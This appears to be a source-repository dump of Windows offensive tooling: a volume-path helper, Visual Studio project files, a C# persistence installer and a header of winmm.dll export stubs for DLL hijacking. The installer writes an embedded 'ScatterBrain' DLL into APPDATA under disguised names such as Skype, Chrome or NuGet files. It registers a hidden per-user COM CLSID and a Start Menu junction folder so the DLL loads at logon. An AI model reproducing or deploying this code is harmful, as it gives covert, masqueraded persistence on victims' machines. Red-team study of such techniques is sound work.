119 | __in PWCHAR VolumeName
120 | )
121 | {
122 | DWORD CharCount = MAX_PATH + 1;
123 | PWCHAR Names = NULL;
124 | PWCHAR NameIdx = NULL;
125 | BOOL Success = FALSE;
126 |
127 | for (;;)
128 | {
129 | //
130 | // Allocate a buffer to hold the paths.
131 | Names = (PWCHAR) new BYTE[CharCount * sizeof(WCHAR)];
132 |
133 | if (!Names)
134 | {
135 | //
136 | // If memory can't be allocated, return.
137 | return NULL;
138 | }
139 |
140 | //
141 | // Obtain all of the paths
142 | // for this volume.
143 | Success = GetVolumePathNamesForVolumeNameW(
144 | VolumeName, Names, CharCount, &CharCount
145 | );
146 |
147 | if (Success)
148 | {
149 | break;
150 | }
151 |
152 | if (GetLastError() != ERROR_MORE_DATA)
153 | {
154 | break;
155 | }
156 |
157 | //
158 | // Try again with the
159 | // new suggested size.
160 | delete[] Names;
161 | Names = NULL;
162 | }
163 |
164 | if (Success)
165 | {
166 | //
167 | // Display the various paths.
168 | //wprintf(L"Names: %s\n", Names);
169 | return Names;
170 | /*for (NameIdx = Names;
171 | NameIdx[0] != L'\0';
172 | NameIdx += wcslen(NameIdx) + 1)
173 | {
174 | wprintf(L" %s", NameIdx);
175 | }
176 | wprintf(L"\n");*/
177 | }
178 |
179 | if (Names != NULL)
180 | {
181 | delete[] Names;
182 | Names = NULL;
183 | }
184 |
185 | return Names;
186 | }
187 |
188 |
189 | // Maps a device volume path to a filepath,
190 | // like \Device\Harddisk4\Windows\System32\cmd.exe --> C:\Windows\System32\cmd.exe
191 | void TranslateVolumeToPath(LPCWSTR path, WCHAR* out)
192 | {
193 | DWORD CharCount = 0;
194 | WCHAR DeviceName[MAX_PATH] = L"";
195 | DWORD Error = ERROR_SUCCESS;
196 | HANDLE FindHandle = INVALID_HANDLE_VALUE;
197 | BOOL Found = FALSE;
198 | size_t Index = 0;
199 | BOOL Success = FALSE;
200 | WCHAR VolumeName[MAX_PATH] = L"";
201 |
202 | WCHAR driveResult[3];
203 |
204 | //
205 | // Enumerate all volumes in the system.
206 | FindHandle = FindFirstVolumeW(VolumeName, ARRAYSIZE(VolumeName));
207 |
208 | if (FindHandle == INVALID_HANDLE_VALUE)
209 | {
210 | Error = GetLastError();
211 | wprintf(L"FindFirstVolumeW failed with error code %d\n", Error);
212 | return;
213 | }
214 |
215 | for (;;)
216 | {
217 | //
218 | // Skip the \\?\ prefix and remove the trailing backslash.
219 | Index = wcslen(VolumeName) - 1;
220 |
221 | if (VolumeName[0] != L'\\' ||
222 | VolumeName[1] != L'\\' ||
223 | VolumeName[2] != L'?' ||
224 | VolumeName[3] != L'\\' ||
225 | VolumeName[Index] != L'\\')
226 | {
227 | Error = ERROR_BAD_PATHNAME;
228 | wprintf(L"FindFirstVolumeW/FindNextVolumeW returned a bad path: %s\n", VolumeName);
229 | break;
230 | }
231 |
232 | //
233 | // QueryDosDeviceW does not allow a trailing backslash,
234 | // so temporarily remove it.
235 | VolumeName[Index] = L'\0';
236 |
237 | CharCount = QueryDosDeviceW(&VolumeName[4], DeviceName, ARRAYSIZE(DeviceName));
238 |
239 | VolumeName[Index] = L'\\';
240 |
241 | if (CharCount == 0)
242 | {
243 | Error = GetLastError();
244 | wprintf(L"QueryDosDeviceW failed with error code %d\n", Error);
245 | break;
246 | }
247 |
248 | /*wprintf(L"\nFound a device:\n %s", DeviceName);
249 | wprintf(L"\nVolume name: %s", VolumeName);*/
250 | if (wcsstr(path, DeviceName))
251 | {
252 | //wprintf(L"%s appears to match %s!\n", DeviceName, path);
253 | PWCHAR drive = GetVolumePaths(VolumeName);
254 | if (drive == NULL)
255 | {
256 | printf("Couldn't translate %s to a drive. FAILED.\n", path);
257 | }
258 | else
259 | {
260 | //wprintf(L"Parsed drive: %s\n", drive);
261 | std::wstring temp = path;
262 | temp.replace(0, 24, drive, 3);
263 | /*WCHAR* result = (WCHAR*)malloc(sizeof(drive) + sizeof(temp) - 25);
264 | StrCpyW(result, drive);
265 | StrCpyW(result + wcslen(drive), path);*/
266 | FindVolumeClose(FindHandle);
267 | FindHandle = INVALID_HANDLE_VALUE;
268 | StrCpyW(out, temp.c_str());
269 | //wprintf(L"We think that the result should be: %s\n", out);
270 | return;
271 | }
272 | }
273 |
274 | //
275 | // Move on to the next volume.
276 | Success = FindNextVolumeW(FindHandle, VolumeName, ARRAYSIZE(VolumeName));
277 |
278 | if (!Success)
279 | {
280 | Error = GetLastError();
281 |
282 | if (Error != ERROR_NO_MORE_FILES)
283 | {
284 | wprintf(L"FindNextVolumeW failed with error code %d\n", Error);
285 | break;
286 | }
287 |
288 | //
289 | // Finished iterating
290 | // through all the volumes.
291 | Error = ERROR_SUCCESS;
292 | break;
293 | }
294 | }
295 |
296 | FindVolumeClose(FindHandle);
297 | FindHandle = INVALID_HANDLE_VALUE;
298 |
299 | return;
300 | }
301 |
--------------------------------------------------------------------------------
/DWELLS/DWELLS.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 15.0
23 | {E6331C54-4C87-41EE-AE06-8B47AC7D9306}
24 | Win32Proj
25 | DWELLS
26 | 10.0.17763.0
27 |
28 |
29 |
30 | DynamicLibrary
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | DynamicLibrary
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | DynamicLibrary
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | false
75 |
76 |
77 | true
78 |
79 |
80 | true
81 |
82 |
83 | false
84 |
85 |
86 |
87 | Use
88 | Level3
89 | MaxSpeed
90 | true
91 | true
92 | true
93 | NDEBUG;DWELLS_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
94 | true
95 | MultiThreaded
96 |
97 |
98 | Console
99 | true
100 | true
101 | true
102 | Resource.rc;
103 |
104 |
105 |
106 |
107 | Use
108 | Level3
109 | Disabled
110 | true
111 | WIN32;_DEBUG;DWELLS_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
112 | true
113 |
114 |
115 | Windows
116 | true
117 |
118 |
119 |
120 |
121 | Use
122 | Level3
123 | Disabled
124 | true
125 | _DEBUG;DWELLS_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
126 | true
127 |
128 |
129 | Windows
130 | true
131 |
132 |
133 |
134 |
135 | Use
136 | Level3
137 | MaxSpeed
138 | true
139 | true
140 | true
141 | WIN32;NDEBUG;DWELLS_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
142 | true
143 |
144 |
145 | Windows
146 | true
147 | true
148 | true
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
161 | Create
162 | Create
163 | Create
164 | Create
165 |
166 |
167 |
168 |
169 |
170 |
171 |
172 |
173 |
174 |
175 |
176 |
--------------------------------------------------------------------------------
/AccessibilityFeaturesPersistence/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.IO;
6 | using Microsoft.Win32;
7 |
8 | namespace AccessibilityFeaturesPersistence
9 | {
10 | class Program
11 | {
12 | static string TechnologyName;
13 |
14 | public static void DeleteDirectory(string target_dir)
15 | {
16 | string[] files = Directory.GetFiles(target_dir);
17 | string[] dirs = Directory.GetDirectories(target_dir);
18 |
19 | foreach (string file in files)
20 | {
21 | File.SetAttributes(file, FileAttributes.Normal);
22 | File.Delete(file);
23 | }
24 |
25 | foreach (string dir in dirs)
26 | {
27 | DeleteDirectory(dir);
28 | }
29 |
30 | Directory.Delete(target_dir, false);
31 | }
32 |
33 | static void UninstallProgram(string comGuid)
34 | {
35 | Console.WriteLine("[*] Removing {0}", comGuid);
36 | string comGuidRegPath = "Software\\Classes\\CLSID\\" + comGuid;
37 | string inProc32Path = comGuidRegPath + "\\InprocServer32";
38 | RegistryKey inProcKey = Registry.CurrentUser.OpenSubKey(inProc32Path);
39 | var dllPathObj = inProcKey.GetValue("");
40 | var companyObj = inProcKey.GetValue("Company");
41 | string dllPath = dllPathObj.ToString();
42 | string junctionFolder = Environment.GetEnvironmentVariable("APPDATA") + "\\" + companyObj.ToString();
43 | try
44 | {
45 | Console.Write("[*] Attempting to delete {0}... ", dllPath);
46 | File.Delete(dllPath);
47 | Console.WriteLine("Done.");
48 | }
49 | catch (Exception ex)
50 | {
51 | Console.WriteLine("FAILURE.\n[-] Reason: {0}", ex.Message);
52 | }
53 | try
54 | {
55 | Console.Write("[*] Attempting to delete registry tree: {0}... ", comGuidRegPath);
56 | Registry.CurrentUser.DeleteSubKeyTree(comGuidRegPath);
57 | Console.WriteLine("Done.");
58 | }
59 | catch (Exception ex)
60 | {
61 | Console.WriteLine("FAILURE.");
62 | Console.WriteLine("Reason:");
63 | Console.WriteLine(ex);
64 | }
65 | try
66 | {
67 | Console.Write("[*] Attempting to delete {0}... ", junctionFolder);
68 | DeleteDirectory(junctionFolder);
69 | Console.WriteLine("Done.");
70 | }
71 | catch (Exception ex)
72 | {
73 | Console.WriteLine("FAILURE.");
74 | Console.WriteLine("Reason:");
75 | Console.WriteLine(ex);
76 | }
77 | Console.WriteLine("[*] All Done.");
78 | }
79 |
80 | static void InstallProgram()
81 | {
82 | string dllPath = "";
83 | try
84 | {
85 | dllPath = CreateDLL();
86 | }
87 | catch (Exception ex)
88 | {
89 | Console.WriteLine("[-] Error creating DLL. Stack trace:");
90 | Console.WriteLine(ex);
91 | Console.Write("\nAborting.");
92 | Environment.Exit(1);
93 | }
94 | Console.WriteLine("[*] File created: {0}", dllPath);
95 | Guid comGuid = Guid.NewGuid();
96 | Console.WriteLine("[*] Using GUID: {" + comGuid.ToString() + "}");
97 | if (CreateRegistryKeys(comGuid.ToString(), dllPath))
98 | {
99 | Console.WriteLine("[*] Registry updated with CLSID: {" + comGuid.ToString() + "}");
100 | string junctionDir = CreateJunctionFolder(comGuid.ToString());
101 | Console.WriteLine("[+] All done!");
102 | }
103 | else
104 | {
105 | Console.WriteLine("[-] Error creating registry keys. Rerun the assembly with 'uninstall {guid}' flag.");
106 |
107 | Environment.Exit(1);
108 | }
109 | }
110 |
111 | static bool CreateRegistryKeys(string comGuid, string dllPath)
112 | {
113 | try
114 | {
115 | string comGuidRegPath = "Software\\Classes\\CLSID\\{" + comGuid + "}";
116 | string inProc32Path = comGuidRegPath + "\\InprocServer32";
117 | string shellFolderPath = comGuidRegPath + "\\ShellFolder";
118 | RegistryKey inProcKey;
119 | Registry.CurrentUser.CreateSubKey(comGuidRegPath);
120 | inProcKey = Registry.CurrentUser.CreateSubKey(inProc32Path);
121 | inProcKey.SetValue("", dllPath);
122 | inProcKey.SetValue("ThreadingModel", "Apartment");
123 | inProcKey.SetValue("LoadWithoutCOM", "");
124 | inProcKey.SetValue("DateTime", 0, RegistryValueKind.DWord);
125 | inProcKey.SetValue("Company", TechnologyName);
126 | RegistryKey shellFolderKey = Registry.CurrentUser.CreateSubKey(shellFolderPath);
127 | shellFolderKey.SetValue("HideOnDesktop", "", RegistryValueKind.String);
128 | uint attr = (uint)(0xf090013d);
129 | shellFolderKey.SetValue("Attributes", (int)attr, RegistryValueKind.DWord);
130 | inProcKey.Close();
131 | shellFolderKey.Close();
132 | }
133 | catch (Exception ex)
134 | {
135 | Console.WriteLine("[-] Error creating registry keys. Stack trace:");
136 | Console.WriteLine(ex);
137 | return false;
138 | }
139 | return true;
140 | }
141 |
142 | static string CreateJunctionFolder(string guid)
143 | {
144 | string appDataPath = Environment.GetEnvironmentVariable("APPDATA");
145 | string appPath = appDataPath + "\\Microsoft\\Windows\\Start Menu\\Programs\\";
146 | string techPath = appPath + TechnologyName + ".{" + guid + "}";
147 | try
148 | {
149 | Directory.CreateDirectory(techPath);
150 | Console.WriteLine("[+] Created {0}", techPath);
151 | return techPath;
152 | }
153 | catch (Exception ex)
154 | {
155 | Console.WriteLine("[-] Error creating junction directory.");
156 | return "";
157 | }
158 | }
159 |
160 | static string CreateDLL()
161 | {
162 | string tempPath = Environment.GetEnvironmentVariable("APPDATA");
163 | string dllPath = "";
164 | string msftAddinDirectory = tempPath + "\\Microsoft\\AddIns\\";
165 | string skypeDirectory = tempPath + "\\Skype\\RootTools\\";
166 | string nugetPath = tempPath + "\\NuGet\\";
167 | string chromeUserDataDirectory = tempPath + "\\Google\\Chrome\\User Data\\";
168 | if (Directory.Exists(skypeDirectory))
169 | {
170 | dllPath = skypeDirectory + "roottools.dll";
171 | TechnologyName = "Skype";
172 | }
173 | else if (Directory.Exists(chromeUserDataDirectory))
174 | {
175 | dllPath = chromeUserDataDirectory + "userutils.dll";
176 | TechnologyName = "Google";
177 | }
178 | else if (Directory.Exists(nugetPath))
179 | {
180 | dllPath = nugetPath + "NuGet.dll";
181 | TechnologyName = "NuGet";
182 | }
183 | else if (Directory.Exists(msftAddinDirectory))
184 | {
185 | dllPath = msftAddinDirectory + "AccessibilityFeatures.dll";
186 | TechnologyName = "MicrosoftAddins";
187 | }
188 | else
189 | {
190 | dllPath = tempPath + "\\AccessibilityFeatures.dll";
191 | TechnologyName = "AccessbilityFeatures";
192 | }
193 | File.WriteAllBytes(dllPath, Properties.Resources.ScatterBrain);
194 | return dllPath;
195 | }
196 |
197 | static void DeleteFile()
198 | {
199 | string tempPath = Environment.GetEnvironmentVariable("APPDATA");
200 | string dllPath = "";
201 | string msftAddinDirectory = tempPath + "\\Microsoft\\AddIns\\";
202 | string skypeDirectory = tempPath + "\\Skype\\RootTools\\";
203 | string nugetPath = tempPath + "\\NuGet\\";
204 | string chromeUserDataDirectory = tempPath + "\\Google\\Chrome\\User Data\\";
205 | if (Directory.Exists(skypeDirectory))
206 | {
207 | dllPath = skypeDirectory + "roottools.dll";
208 | }
209 | else if (Directory.Exists(chromeUserDataDirectory))
210 | {
211 | dllPath = chromeUserDataDirectory + "userutils.dll";
212 | }
213 | else if (Directory.Exists(nugetPath))
214 | {
215 | dllPath = nugetPath + "NuGet.dll";
216 | }
217 | else if (Directory.Exists(msftAddinDirectory))
218 | {
219 | dllPath = msftAddinDirectory + "AccessibilityFeatures.dll";
220 | }
221 | else
222 | {
223 | dllPath = tempPath + "\\AccessibilityFeatures.dll";
224 | }
225 | if (dllPath != "")
226 | {
227 | File.Delete(dllPath);
228 | Console.WriteLine("[*] Deleted {0}", dllPath);
229 | }
230 | else
231 | {
232 | Console.WriteLine("[-] Could not find dll.");
233 | }
234 | }
235 |
236 | static void Usage()
237 | {
238 | string usage = @"
239 | Usage:
240 | Arguments:
241 | install - Installs the agent.
242 | uninstall {CLSID} - Uninstalls the given CLSID.
243 |
244 | Examples:
245 | .\AccessibilityFeaturesPersistence.exe install
246 | .\AccessibilityFeaturesPersistence.exe uninstall ""{a3df199e-bc97-4c87-ada6-4b5287a0d9e5}""
247 | ";
248 | Console.WriteLine(usage);
249 | }
250 |
251 | static void Main(string[] args)
252 | {
253 | if (args.Length == 0 || args.Length > 2)
254 | {
255 | Usage();
256 | Environment.Exit(0);
257 | }
258 | else if (args[0] == "install")
259 | {
260 | InstallProgram();
261 | }
262 | else if (args[0] == "uninstall" && args.Length == 2)
263 | {
264 | if (args[1].Length != 38)
265 | {
266 | Console.WriteLine("[-] Error parsing CLSID. Must be of the form: {CLSID}");
267 | Environment.Exit(1);
268 | }
269 | UninstallProgram(args[1]);
270 | }
271 | else
272 | {
273 | Usage();
274 | Environment.Exit(1);
275 | }
276 | }
277 | }
278 | }
279 |
--------------------------------------------------------------------------------
/ScatterBrain/ScatterBrain.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 15.0
23 | {B59D77D7-D8DB-45DB-9B1F-0795FA32459C}
24 | Win32Proj
25 | ScatterBrain
26 | 10.0.17763.0
27 | ScatterBrain
28 |
29 |
30 |
31 | DynamicLibrary
32 | true
33 | v142
34 | Unicode
35 |
36 |
37 | Application
38 | false
39 | v142
40 | true
41 | Unicode
42 |
43 |
44 | Application
45 | true
46 | v142
47 | Unicode
48 | false
49 |
50 |
51 | DynamicLibrary
52 | false
53 | v142
54 | true
55 | Unicode
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 | true
77 |
78 |
79 | true
80 |
81 |
82 | false
83 |
84 |
85 | false
86 |
87 |
88 |
89 | Use
90 | Level3
91 | Disabled
92 | true
93 | WIN32;_DEBUG;USAIN_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
94 | true
95 |
96 |
97 | Windows
98 | true
99 |
100 |
101 |
102 |
103 | Use
104 | Level3
105 | Disabled
106 | true
107 | _DEBUG;USAIN_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
108 | true
109 |
110 |
111 | Console
112 | true
113 | kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;shlwapi.lib;Iphlpapi.lib;netapi32.lib;wintrust.lib;%(AdditionalDependencies)
114 |
115 |
116 |
117 |
118 | Use
119 | Level3
120 | MaxSpeed
121 | true
122 | true
123 | true
124 | WIN32;NDEBUG;USAIN_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
125 | true
126 |
127 |
128 | Console
129 | true
130 | true
131 | true
132 | kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;shlwapi.lib;Iphlpapi.lib;netapi32.lib;wintrust.lib;%(AdditionalDependencies)
133 |
134 |
135 |
136 |
137 | Use
138 | Level3
139 | MaxSpeed
140 | true
141 | true
142 | true
143 | NDEBUG;USAIN_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
144 | true
145 | MultiThreaded
146 |
147 |
148 | Console
149 | true
150 | true
151 | true
152 | kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;shlwapi.lib;Iphlpapi.lib;netapi32.lib;wintrust.lib;%(AdditionalDependencies)
153 | Yes
154 |
155 |
156 | if "$(ConfigurationName)" == "Release" (copy $(ProjectDir)..\x64\Release\ScatterBrain.dll $(ProjectDir)..\SharpWMI\SharpWMI\Resources\ScatterBrain.dll /Y && copy $(ProjectDir)..\x64\Release\ScatterBrain.dll $(ProjectDir)..\DWELLS\data1.bin /Y && copy $(ProjectDir)..\x64\Release\ScatterBrain.dll $(ProjectDir)..\AccessibilityFeaturesPersistence\Resources\ScatterBrain.dll /Y)
157 |
158 |
159 |
160 |
161 |
162 |
163 |
164 |
165 |
166 |
167 |
168 |
169 |
170 |
171 |
172 |
173 |
174 |
175 |
176 |
177 |
178 |
179 |
180 |
181 |
182 |
183 |
184 |
185 |
186 |
187 | Create
188 | Create
189 | Create
190 | Create
191 |
192 |
193 |
194 |
195 |
196 |
197 |
198 |
--------------------------------------------------------------------------------
/ScatterBrain/HijackStubs.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include "stdafx.h"
3 |
4 | extern "C" __declspec(dllexport) void CloseDriver();
5 | extern "C" __declspec(dllexport) void DefDriverProc();
6 | extern "C" __declspec(dllexport) void DriverCallback();
7 | extern "C" __declspec(dllexport) void DrvGetModuleHandle();
8 | extern "C" __declspec(dllexport) void GetDriverModuleHandle();
9 | extern "C" __declspec(dllexport) void NotifyCallbackData();
10 | extern "C" __declspec(dllexport) void OpenDriver();
11 | extern "C" __declspec(dllexport) void PlaySound();
12 | extern "C" __declspec(dllexport) void PlaySoundA();
13 | extern "C" __declspec(dllexport) void PlaySoundW();
14 | extern "C" __declspec(dllexport) void SendDriverMessage();
15 | extern "C" __declspec(dllexport) void WOW32DriverCallback();
16 | extern "C" __declspec(dllexport) void WOW32ResolveMultiMediaHandle();
17 | extern "C" __declspec(dllexport) void WOWAppExit();
18 | extern "C" __declspec(dllexport) void aux32Message();
19 | extern "C" __declspec(dllexport) void auxGetDevCapsA();
20 | extern "C" __declspec(dllexport) void auxGetDevCapsW();
21 | extern "C" __declspec(dllexport) void auxGetNumDevs();
22 | extern "C" __declspec(dllexport) void auxGetVolume();
23 | extern "C" __declspec(dllexport) void auxOutMessage();
24 | extern "C" __declspec(dllexport) void auxSetVolume();
25 | extern "C" __declspec(dllexport) void joy32Message();
26 | extern "C" __declspec(dllexport) void joyConfigChanged();
27 | extern "C" __declspec(dllexport) void joyGetDevCapsA();
28 | extern "C" __declspec(dllexport) void joyGetDevCapsW();
29 | extern "C" __declspec(dllexport) void joyGetNumDevs();
30 | extern "C" __declspec(dllexport) void joyGetPos();
31 | extern "C" __declspec(dllexport) void joyGetPosEx();
32 | extern "C" __declspec(dllexport) void joyGetThreshold();
33 | extern "C" __declspec(dllexport) void joyReleaseCapture();
34 | extern "C" __declspec(dllexport) void joySetCapture();
35 | extern "C" __declspec(dllexport) void joySetThreshold();
36 | extern "C" __declspec(dllexport) void mci32Message();
37 | extern "C" __declspec(dllexport) void mciDriverNotify();
38 | extern "C" __declspec(dllexport) void mciDriverYield();
39 | extern "C" __declspec(dllexport) void mciExecute();
40 | extern "C" __declspec(dllexport) void mciFreeCommandResource();
41 | extern "C" __declspec(dllexport) void mciGetCreatorTask();
42 | extern "C" __declspec(dllexport) void mciGetDeviceIDA();
43 | extern "C" __declspec(dllexport) void mciGetDeviceIDFromElementIDA();
44 | extern "C" __declspec(dllexport) void mciGetDeviceIDFromElementIDW();
45 | extern "C" __declspec(dllexport) void mciGetDeviceIDW();
46 | extern "C" __declspec(dllexport) void mciGetDriverData();
47 | extern "C" __declspec(dllexport) void mciGetErrorStringA();
48 | extern "C" __declspec(dllexport) void mciGetErrorStringW();
49 | extern "C" __declspec(dllexport) void mciGetYieldProc();
50 | extern "C" __declspec(dllexport) void mciLoadCommandResource();
51 | extern "C" __declspec(dllexport) void mciSendCommandA();
52 | extern "C" __declspec(dllexport) void mciSendCommandW();
53 | extern "C" __declspec(dllexport) void mciSendStringA();
54 | extern "C" __declspec(dllexport) void mciSendStringW();
55 | extern "C" __declspec(dllexport) void mciSetDriverData();
56 | extern "C" __declspec(dllexport) void mciSetYieldProc();
57 | extern "C" __declspec(dllexport) void mid32Message();
58 | extern "C" __declspec(dllexport) void midiConnect();
59 | extern "C" __declspec(dllexport) void midiDisconnect();
60 | extern "C" __declspec(dllexport) void midiInAddBuffer();
61 | extern "C" __declspec(dllexport) void midiInClose();
62 | extern "C" __declspec(dllexport) void midiInGetDevCapsA();
63 | extern "C" __declspec(dllexport) void midiInGetDevCapsW();
64 | extern "C" __declspec(dllexport) void midiInGetErrorTextA();
65 | extern "C" __declspec(dllexport) void midiInGetErrorTextW();
66 | extern "C" __declspec(dllexport) void midiInGetID();
67 | extern "C" __declspec(dllexport) void midiInGetNumDevs();
68 | extern "C" __declspec(dllexport) void midiInMessage();
69 | extern "C" __declspec(dllexport) void midiInOpen();
70 | extern "C" __declspec(dllexport) void midiInPrepareHeader();
71 | extern "C" __declspec(dllexport) void midiInReset();
72 | extern "C" __declspec(dllexport) void midiInStart();
73 | extern "C" __declspec(dllexport) void midiInStop();
74 | extern "C" __declspec(dllexport) void midiInUnprepareHeader();
75 | extern "C" __declspec(dllexport) void midiOutCacheDrumPatches();
76 | extern "C" __declspec(dllexport) void midiOutCachePatches();
77 | extern "C" __declspec(dllexport) void midiOutClose();
78 | extern "C" __declspec(dllexport) void midiOutGetDevCapsA();
79 | extern "C" __declspec(dllexport) void midiOutGetDevCapsW();
80 | extern "C" __declspec(dllexport) void midiOutGetErrorTextA();
81 | extern "C" __declspec(dllexport) void midiOutGetErrorTextW();
82 | extern "C" __declspec(dllexport) void midiOutGetID();
83 | extern "C" __declspec(dllexport) void midiOutGetNumDevs();
84 | extern "C" __declspec(dllexport) void midiOutGetVolume();
85 | extern "C" __declspec(dllexport) void midiOutLongMsg();
86 | extern "C" __declspec(dllexport) void midiOutMessage();
87 | extern "C" __declspec(dllexport) void midiOutOpen();
88 | extern "C" __declspec(dllexport) void midiOutPrepareHeader();
89 | extern "C" __declspec(dllexport) void midiOutReset();
90 | extern "C" __declspec(dllexport) void midiOutSetVolume();
91 | extern "C" __declspec(dllexport) void midiOutShortMsg();
92 | extern "C" __declspec(dllexport) void midiOutUnprepareHeader();
93 | extern "C" __declspec(dllexport) void midiStreamClose();
94 | extern "C" __declspec(dllexport) void midiStreamOpen();
95 | extern "C" __declspec(dllexport) void midiStreamOut();
96 | extern "C" __declspec(dllexport) void midiStreamPause();
97 | extern "C" __declspec(dllexport) void midiStreamPosition();
98 | extern "C" __declspec(dllexport) void midiStreamProperty();
99 | extern "C" __declspec(dllexport) void midiStreamRestart();
100 | extern "C" __declspec(dllexport) void midiStreamStop();
101 | extern "C" __declspec(dllexport) void mixerClose();
102 | extern "C" __declspec(dllexport) void mixerGetControlDetailsA();
103 | extern "C" __declspec(dllexport) void mixerGetControlDetailsW();
104 | extern "C" __declspec(dllexport) void mixerGetDevCapsA();
105 | extern "C" __declspec(dllexport) void mixerGetDevCapsW();
106 | extern "C" __declspec(dllexport) void mixerGetID();
107 | extern "C" __declspec(dllexport) void mixerGetLineControlsA();
108 | extern "C" __declspec(dllexport) void mixerGetLineControlsW();
109 | extern "C" __declspec(dllexport) void mixerGetLineInfoA();
110 | extern "C" __declspec(dllexport) void mixerGetLineInfoW();
111 | extern "C" __declspec(dllexport) void mixerGetNumDevs();
112 | extern "C" __declspec(dllexport) void mixerMessage();
113 | extern "C" __declspec(dllexport) void mixerOpen();
114 | extern "C" __declspec(dllexport) void mixerSetControlDetails();
115 | extern "C" __declspec(dllexport) void mmDrvInstall();
116 | extern "C" __declspec(dllexport) void mmGetCurrentTask();
117 | extern "C" __declspec(dllexport) void mmTaskBlock();
118 | extern "C" __declspec(dllexport) void mmTaskCreate();
119 | extern "C" __declspec(dllexport) void mmTaskSignal();
120 | extern "C" __declspec(dllexport) void mmTaskYield();
121 | extern "C" __declspec(dllexport) void mmioAdvance();
122 | extern "C" __declspec(dllexport) void mmioAscend();
123 | extern "C" __declspec(dllexport) void mmioClose();
124 | extern "C" __declspec(dllexport) void mmioCreateChunk();
125 | extern "C" __declspec(dllexport) void mmioDescend();
126 | extern "C" __declspec(dllexport) void mmioFlush();
127 | extern "C" __declspec(dllexport) void mmioGetInfo();
128 | extern "C" __declspec(dllexport) void mmioInstallIOProcA();
129 | extern "C" __declspec(dllexport) void mmioInstallIOProcW();
130 | extern "C" __declspec(dllexport) void mmioOpenA();
131 | extern "C" __declspec(dllexport) void mmioOpenW();
132 | extern "C" __declspec(dllexport) void mmioRead();
133 | extern "C" __declspec(dllexport) void mmioRenameA();
134 | extern "C" __declspec(dllexport) void mmioRenameW();
135 | extern "C" __declspec(dllexport) void mmioSeek();
136 | extern "C" __declspec(dllexport) void mmioSendMessage();
137 | extern "C" __declspec(dllexport) void mmioSetBuffer();
138 | extern "C" __declspec(dllexport) void mmioSetInfo();
139 | extern "C" __declspec(dllexport) void mmioStringToFOURCCA();
140 | extern "C" __declspec(dllexport) void mmioStringToFOURCCW();
141 | extern "C" __declspec(dllexport) void mmioWrite();
142 | extern "C" __declspec(dllexport) void mmsystemGetVersion();
143 | extern "C" __declspec(dllexport) void mod32Message();
144 | extern "C" __declspec(dllexport) void mxd32Message();
145 | extern "C" __declspec(dllexport) void sndPlaySoundA();
146 | extern "C" __declspec(dllexport) void sndPlaySoundW();
147 | extern "C" __declspec(dllexport) void tid32Message();
148 | extern "C" __declspec(dllexport) void timeBeginPeriod();
149 | extern "C" __declspec(dllexport) void timeEndPeriod();
150 | extern "C" __declspec(dllexport) void timeGetDevCaps();
151 | extern "C" __declspec(dllexport) void timeGetSystemTime();
152 | extern "C" __declspec(dllexport) void timeGetTime();
153 | extern "C" __declspec(dllexport) void timeKillEvent();
154 | extern "C" __declspec(dllexport) void timeSetEvent();
155 | extern "C" __declspec(dllexport) void waveInAddBuffer();
156 | extern "C" __declspec(dllexport) void waveInClose();
157 | extern "C" __declspec(dllexport) void waveInGetDevCapsA();
158 | extern "C" __declspec(dllexport) void waveInGetDevCapsW();
159 | extern "C" __declspec(dllexport) void waveInGetErrorTextA();
160 | extern "C" __declspec(dllexport) void waveInGetErrorTextW();
161 | extern "C" __declspec(dllexport) void waveInGetID();
162 | extern "C" __declspec(dllexport) void waveInGetNumDevs();
163 | extern "C" __declspec(dllexport) void waveInGetPosition();
164 | extern "C" __declspec(dllexport) void waveInMessage();
165 | extern "C" __declspec(dllexport) void waveInOpen();
166 | extern "C" __declspec(dllexport) void waveInPrepareHeader();
167 | extern "C" __declspec(dllexport) void waveInReset();
168 | extern "C" __declspec(dllexport) void waveInStart();
169 | extern "C" __declspec(dllexport) void waveInStop();
170 | extern "C" __declspec(dllexport) void waveInUnprepareHeader();
171 | extern "C" __declspec(dllexport) void waveOutBreakLoop();
172 | extern "C" __declspec(dllexport) void waveOutClose();
173 | extern "C" __declspec(dllexport) void waveOutGetDevCapsA();
